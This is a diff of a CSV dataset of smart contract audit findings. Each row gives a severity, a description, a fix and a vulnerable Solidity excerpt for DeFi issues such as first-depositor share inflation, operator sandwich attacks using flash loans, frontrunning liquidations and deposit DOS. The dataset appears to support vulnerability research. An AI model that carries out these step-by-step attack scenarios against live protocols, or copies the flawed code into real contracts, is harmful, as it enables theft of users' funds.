diff --git "a/db-vulnerable.csv" "b/db-vulnerable.csv" --- "a/db-vulnerable.csv" +++ "b/db-vulnerable.csv" @@ -1,1973 +1,1973 @@ -nameчseverityчdescriptionчrecommendationчimpactчfunction -On liquidation, if netPnLE36 <= 0, the premium paid by the liquidator is locked in the contract.чhighчWhen liquidating a position, the liquidator is required to pay premium to Lender, which is accumulated in sharingProfitTokenAmts together with Lender's profit and paid to Lender in `_shareProfitsAndRepayAllDebts()`.\\n```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nHowever, if netPnLE36 <= 0, `_shareProfitsAndRepayAllDebts()` will not pay any profit to Lender and the premium in sharingProfitTokenAmts will also not be paid to Lender, which means that the premium paid by the liquidator will be locked in the contract.\\n```\\n function _shareProfitsAndRepayAllDebts( address _positionManager, address _posOwner, uint _posId,\\n int _netPnLE36, uint[] memory _shareProfitAmts, address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. 
if net pnl is positive, share profits to lending proxy\\n if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n }\\n```\\n\\nAlso, when the position is closed, the tokens in the contract will be sent to the caller, so the next person who closes the position will get the locked tokens.\\n```\\n underlyingAmts = new uint[](underlyingTokens.length);\\n for (uint i; i < underlyingTokens.length; ) {\\n underlyingAmts[i] = IERC20(underlyingTokens[i]).balanceOf(address(this));\\n if (underlyingAmts[i] < _params.minUnderlyingAmts[i]) {\\n revert TokenAmountLessThanExpected(\\n underlyingTokens[i],\\n underlyingAmts[i],\\n _params.minUnderlyingAmts[i]\\n );\\n }\\n _doRefund(underlyingTokens[i], underlyingAmts[i]);\\n unchecked {\\n ++i;\\n }\\n```\\nчModify `shareProfitsAndRepayAllDebts()` as follows:\\n```\\n function _shareProfitsAndRepayAllDebts(\\n address _positionManager,\\n address _posOwner,\\n uint _posId,\\n int _netPnLE36,\\n uint[] memory _shareProfitAmts,\\n address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. if net pnl is positive, share profits to lending proxy\\n - if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n - }\\n```\\nчч```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. 
add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -The liquidated person can make the liquidator lose premium by adding collateral in advanceчhighчWhen the position with debtRatioE18 >= 1e18 or startLiqTimestamp ! = 0, the position can be liquidated. On liquidation, the liquidator needs to pay premium, but the profit is related to the position's health factor and deltaTime, and when discount == 0, the liquidator loses premium.\\n```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? 
((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n ONE_E18;\\n```\\n\\nConsider the following scenario.\\nAlice notices Bob's position with debtRatioE18 >= 1e18 and calls `liquidatePosition()` to liquidate.\\nBob observes Alice's transaction, frontruns a call `markLiquidationStatus()` to make startLiqTimestamp == block.timestamp, and calls `adjustExtraColls()` to bring the position back to the health state.\\nAlice's transaction is executed, and since the startLiqTimestamp of Bob's position.startLiqTimestamp ! = 0, it can be liquidated, but since discount = 0, Alice loses premium. This breaks the protocol's liquidation mechanism and causes the liquidator not to launch liquidation for fear of losing assets, which will lead to more bad debtsчConsider having the liquidated person bear the premium, or at least have the liquidator use the minDiscount parameter to set the minimum acceptable discount.чч```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. 
calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? ((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n ONE_E18;\\n```\\n -First depositor can steal asset tokens of othersчhighчThe first depositor can be front run by an attacker and as a result will lose a considerable part of the assets provided. When the pool has no share supply, in `_mintInternal()`, the amount of shares to be minted is equal to the assets provided. 
An attacker can abuse of this situation and profit of the rounding down operation when calculating the amount of shares if the supply is non-zero.\\n```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n\\nConsider the following scenario.\\nAlice wants to deposit 2M * 1e6 USDC to a pool.\\nBob observes Alice's transaction, frontruns to deposit 1 wei USDC to mint 1 wei share, and transfers 1 M * 1e6 USDC to the pool.\\nAlice's transaction is executed, since _totalAsset = 1M * 1e6 + 1 and totalSupply = 1, Alice receives 2M * 1e6 * 1 / (1M * 1e6 + 1) = 1 share.\\nThe pool now has 3M*1e6 +1 assets and distributed 2 shares. 
Bob profits 0.5 M and Alice loses 0.5 M USDC.чWhen _totalSupply == 0, send the first min liquidity LP tokens to the zero address to enable share dilution Another option is to use the ERC4626 implementation(https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/extensions/ERC4626.sol#L199C14-L208) from OZ.чч```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n -The attacker can use larger dust when opening a position to perform griefing attacksчhighчWhen opening a position, unused assets are sent to dustVault as dust, but since these dust are not subtracted from inputAmt, they are included in the calculation of positionOpenUSDValueE36, resulting in a small netPnLE36, which can be used by an attacker to perform a griefing attack.\\n```\\n uint inputTotalUSDValueE36;\\n for (uint i; i < openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\nчConsider subtracting dust from inputAmt when opening a position.чч```\\n uint inputTotalUSDValueE36;\\n for (uint i; i < 
openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\n -An attacker can increase liquidity to the position's UniswapNFT to prevent the position from being closedчhighчUniswapV3NPM allows the user to increase liquidity to any NFT.\\n```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n\\nWhen closing a position, in `_redeemPosition()`, only the initial liquidity of the NFT will be decreased, and then the NFT will be burned.\\n```\\n function _redeemPosition(\\n address _user, uint _posId\\n ) internal override returns (address[] memory rewardTokens, uint[] memory rewardAmts) {\\n address _positionManager = positionManager;\\n uint128 collAmt = IUniswapV3PositionManager(_positionManager).getPositionCollAmt(_user, \\n _posId);\\n // 1. take lp & extra coll tokens from lending proxy\\n _takeAllCollTokens(_positionManager, _user, _posId, address(this));\\n UniV3ExtraPosInfo memory extraPosInfo = IUniswapV3PositionManager(_positionManager)\\n .getDecodedExtraPosInfo(_user, _posId);\\n address _uniswapV3NPM = uniswapV3NPM; // gas saving\\n // 2. 
remove underlying tokens from lp (internal remove in NPM)\\n IUniswapV3NPM(_uniswapV3NPM).decreaseLiquidity(\\n IUniswapV3NPM.DecreaseLiquidityParams({\\n tokenId: extraPosInfo.uniV3PositionId,liquidity: collAmt, amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n })\\n );\\n // rest of code\\n // 4. burn LP position\\n IUniswapV3NPM(_uniswapV3NPM).burn(extraPosInfo.uniV3PositionId);\\n }\\n```\\n\\nIf the liquidity of the NFT is not 0, burning will fail.\\n```\\n function burn(uint256 tokenId) external payable override isAuthorizedForToken(tokenId) {\\n Position storage position = _positions[tokenId];\\n require(position.liquidity == 0 && position.tokensOwed0 == 0 && position.tokensOwed1 == 0,'Not cleared');\\n delete _positions[tokenId];\\n _burn(tokenId);\\n }\\n```\\n\\nThis allows an attacker to add 1 wei liquidity to the position's NFT to prevent the position from being closed, and later when the position expires, the attacker can liquidate it.чConsider decreasing the actual liquidity(using uniswapV3NPM.positions to get it) of the NFT in `_redeemPosition()`, instead of the initial liquidityчч```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n -SwapHelper.getCalldata should check whitelistedRouters[_router]чmediumч`SwapHelper.getCalldata()` returns data for swap based on the input, and uses whitelistedRouters to limit the _router param. The issue here is that when `setWhitelistedRouters()` sets the _routers state to false, it does not reset the data in routerTypes and swapInfos, which results in the router still being available in `getCalldata()`. 
As a result, users can still swap with invalid router data.\\n```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\nчConsider checking whitelistedRouters[_router] in SwapHelper.getCalldata()чч```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -The swap when closing a position does not consider shareProfitAmtsчmediumчWhen closing a position, token swap is performed to ensure that the closer can repay the debt, for example, when operation == EXACT_IN, tokens of borrowAmt are required to be excluded from the swap, and when operation == EXACT_OUT, tokens of borrowAmt are required to be swapped. The issue here is that the closer needs to pay not only the borrowAmt but also the shareProfitAmts, which causes the closure to fail when percentSwapE18 = 100% due to insufficient tokens. Although the closer can adjust the percentSwapE18 to make the closure successful, it greatly increases the complexity.\\n```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? 
IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\nчConsider taking shareProfitAmts into account when calculating swapAmtчч```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\n -The freeze mechanism reduces the borrowableAmount, which reduces Lender's yieldчmediumчThe contract has two freeze intervals, mintFreezeInterval and freezeBuckets.interval, the former to prevent users from making flash accesses and the latter to prevent borrowers from running out of funds. Both freeze intervals are applied when a user deposits, and due to the difference in unlocking time, it significantly reduces borrowableAmount and thus reduces Lender's yield.\\n```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n\\nConsider freezeBuckets.interval == mintFreezeInterval = 1 day, 100 ETH in the LendingPool, and borrowableAmount = 100 ETH. At day 0 + 1s, Alice deposits 50 ETH, borrowableAmount = 150 ETH**-** lockedAmount(50 ETH) = 100 ETH, the 50 ETH frozen in freezeBuckets will be unlocked on day 2, while unfreezeTime[alice] = day 1 + 1s. 
At day 1 + 1s, unfreezeTime[Alice] is reached, Alice can withdraw 50 ETH, borrowableAmount = 100 ETH - LockedAmount(50 ETH) = 50 ETH. If Bob wants to borrow the available funds in the Pool at this time, Bob can only borrow 50 ETH, while the available funds are actually 100 ETH, which will reduce Lender's yield by half. At day 2 + 1s, freezeBuckets is unfrozen and borrowableAmount = 100 ETH -LockedAmount(0 ETH) = 100 ETH.чConsider making mintFreezeInterval >= 2 * freezeBuckets.interval, which makes unfreezeTime greater than the unfreeze time of freezeBuckets.чч```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n -A malicious operator can drain the vault funds in one transactionчhighчThe vault operator can swap tokens using the `trade()` function. They pass the following structure for each trade:\\n```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n\\nNotably, receiveAmtMin is used to guarantee acceptable slippage. An operator can simply pass 0 to make sure the trade is executed. This allows an operator to steal all the funds in the vault by architecting a sandwich attack.\\nFlashloan a large amount of funds\\nSkew the token proportions in a pool which can be used for trading, by almost completely depleting the target token.\\nPerform the trade at >99% slippage\\nSell target tokens for source tokens on the manipulated pool, returning to the original ratio.\\nPay off the flashloan, and keep the tokens traded at 99% slippage. 
In fact, this attack can be done in one TX, different to most sandwich attacks.чThe contract should enforce sensible slippage parameters.чч```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n -A malicious operator can steal all user depositsчhighчIn the Orbital architecture, each Vault user has a numerator which represents their share of the vault holdings. The denominator is by design the sum of all numerators of users, an invariant kept at deposits and withdrawals. For maximum precision, the denominator should be a very large value. Intuitively, numerators could be spread across different users without losing precision. The critical calculations occur in these lines in deposit():\\n```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n \"invalid sumDenoms\");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 \\n wei or less. \\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n\\nIn the initial deposit, Vault sums all token initialDenominators to get the final denominator. It is assumed that the vault will never have this amount in total balances (each token denominator is worth around $100m dollars).\\nIn any other deposit, the deltaN (numerator) credited to the depositor is (denominator * deposit amount / existing balance). When denominator is huge, this calculation is highly precise. However, when denominator is 1, a serious issue oc**curs. 
If user's deposit amount is one wei smaller than existing balance, deltaN would be zero. This property has lead to the well-known ERC4626 inflation attack, where an attacker donates (sends directly to the contract) an amount so that the following deposit is consumed without any shares given to the user. In fact, it is possible to reduce the denominator to 1 and resurrect that attack. The root cause is that the initial deposit denominator is not linear to the deposit amount. Consider the attack flow below, done by a malicious operator:\\nDeploy an ETH/BTC pool\\nFlash loan $100mm in ETH and BTC each\\nPerform an initial deposit of $100mm in ETH/BTC\\nFrom another account, deposit 1 wei ETH / BTC -> receive 1 deltaN\\nWithdraw 100% as operator, reducing denominator to 1.\\nPay off flash loan\\nWait for victim deposits\\nWhen a deposit arrives at the mempool, frontrun with a donation of an equivalent amount. The victim will not receive any shares ( numerator).\\nAny future deposits can be frontran again. Any deposit of less than the current balance will be lost.чConsider checking that user's received deltaN is reasonable. Calculate the expected withdrawable value (deltaN / denominator * balance), and verify that is close enough to the deposited amount.чч```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n \"invalid sumDenoms\");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 \\n wei or less. 
\\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n -Removing a trade path in router will cause serious data corruptionчmediumчThe RouterInfo represents a single UniV3-compatible router which supports a list of token paths. It uses the following data structures:\\n```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n\\n```\\n struct listInfo {\\n bool allowed;\\n uint256 listPosition;\\n }\\n struct pair {\\n address token0;\\n address token1;\\n uint256 numPathsAllowed;\\n }\\n```\\n\\nWhen an admin specifies a new path from token0 to token1, `_increasePairPaths()` is called.\\n```\\n function _increasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n if (!LI.allowed){\\n LI.allowed = true;\\n LI.listPosition = allowedPairsList.length;\\n allowedPairsList.push(pair(token0, token1, 0));\\n }\\n allowedPairsList[LI.listPosition].numPathsAllowed++;\\n }\\n```\\n\\nWhen a path is removed, the complementary function is called.\\n```\\n function _decreasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n require(LI.allowed, \"RouterInfo: pair not allowed\");\\n allowedPairsList[LI.listPosition].numPathsAllowed--;\\n if (allowedPairsList[LI.listPosition].numPathsAllowed == 0){\\n allowedPairsList[LI.listPosition] = \\n allowedPairsList[allowedPairsList.length - 1];\\n allowedPairsList.pop();\\n LI.allowed = false;\\n }\\n }\\n```\\n\\nWhen the last path is removed, the contract reuses the index of the removed pair, to store the last pair in the list. It then removes the last pair, having already copied it. The issue is that the corresponding listInfo structure is not updated, to keep track of index in the pairs list. 
Future usage of the last pair will use a wrong index, which at this moment, is over the array bounds. When a new pair will be created, it will share the index with the corrupted pair. This can cause a variety of serious issues. For example, it will not be possible to remove paths from the corrupted pair until a new pair is created, at which point the new pair will have a wrong numPathsAllowed as it is shared.чUpdate the listPosition member of the last pair in the list, before repositioning it.чч```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n -Attacker can DOS deposit transactions due to strict verificationsчmediumчWhen users deposit funds to the Vault, it verifies that the proportion between the tokens inserted to the vault matches the current vault token balances.\\n```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), \"ratios don't match\");\\n```\\n\\nThe essential part of the check is below:\\n```\\n for (uint256 i = 0; i < sourceRatios.length; i++) {\\n // if (targetRatios[i] != (targetRatios[greatestIndex] * \\n sourceRatios[i]) / greatest) {\\n if (targetRatios[i] != \\n Arithmetic.overflowResistantFraction(targetRatios[greatestIndex], sourceRatios[i], greatest)) {\\n return false;\\n }\\n }\\n```\\n\\nThe exact logic here is not important, but note that a small change in the balance of one of the vault tokens will affect the expected number of tokens that need to be inserted to maintain correct ratio. The exact amounts to be deposited are passed as targetRatios, and sourceRatios is the current balances. Therefore, an attacker can directly transfer a negligible amount of some vault token to the contract to make the amount the user specified in targetRatios not line up with the expected proportion. As a result, the deposit would revert. 
Essentially it is an abuse of the over-granular verification of ratios, leading to a DOS of any deposit in the mempool.чLoosen the restriction on deposit ratios. A DOS attack should cost an amount that the vault creditors would be happy to live with.чч```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), \"ratios don't match\");\\n```\\n -User deposits can fail despite using the correct method for calculation of deposit amountsчmediumчUsers can use the `getAmtsNeededForDeposit()` function to get the amount of tokens that maintain the desired proportion for vault deposits. It will perform a calculation very similar to the one in `ratiosMatch()`, which will verify the deposit.\\n```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n\\nHowever, a difference between the verification function and the getter function is that the getter receives any reference token, while the verification will use proportions based on the deposit amount in the largest balance in the vault. Indeed, these fractions may differ by a small amount. This could cause the `getAmtsNeededForDeposit()` function to respond with values which will not be accepted at deposit, since they will be rounded differently.чCalculation amounts needed using the ratio between largest balance and the deposit amount. 
This would line up the numbers as verification would expect.чч```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n -Several popular ERC20 tokens are incompatible with the vault due to MAX approveчlowчThere are several instances where the vault approves use of funds to the manager or a trade router. It will set approval to MAX_UINT256.\\n```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n\\nThe issue is that there are several popular tokens(https://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers) (UNI, COMP and others) which do not support allowances of above UINT_96. The contract will not be able to interoperate with them.чConsider setting allowance to UINT_96. 
Whenever the allowance is consumed, perform re-approval up to UINT_96.чч```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n -Attacker can freeze deposits and withdrawals indefinitely by submitting a bad withdrawalчhighчUsers request to queue a withdrawal using the function below in Vault.\\n```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), \"ERROR: Invalid token\");\\n require(_amountMLP != 0, \"ERROR: Invalid amount\");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = _stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), \"Withdraw amount > amount MLP\");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n\\nNotice that the function only validates that the user has a sufficient LP token balance to withdraw at the moment of execution. After it is queued up, a user can move their tokens to another wallet. Later in `_settleRequests()`, the Vault will attempt to burn user's tokens:\\n```\\n // Burn moazic LP token.\\n MozaicLP(mozLP).burn(request.user, _mlpToBurn);\\n```\\n\\nThis would revert and block any other settlements from occurring. Therefore, users can block the entire settlement process by requesting a tiny withdrawal amount in every epoch and moving funds to another wallet.чVault should take custody of user's LP tokens when they request withdrawals. 
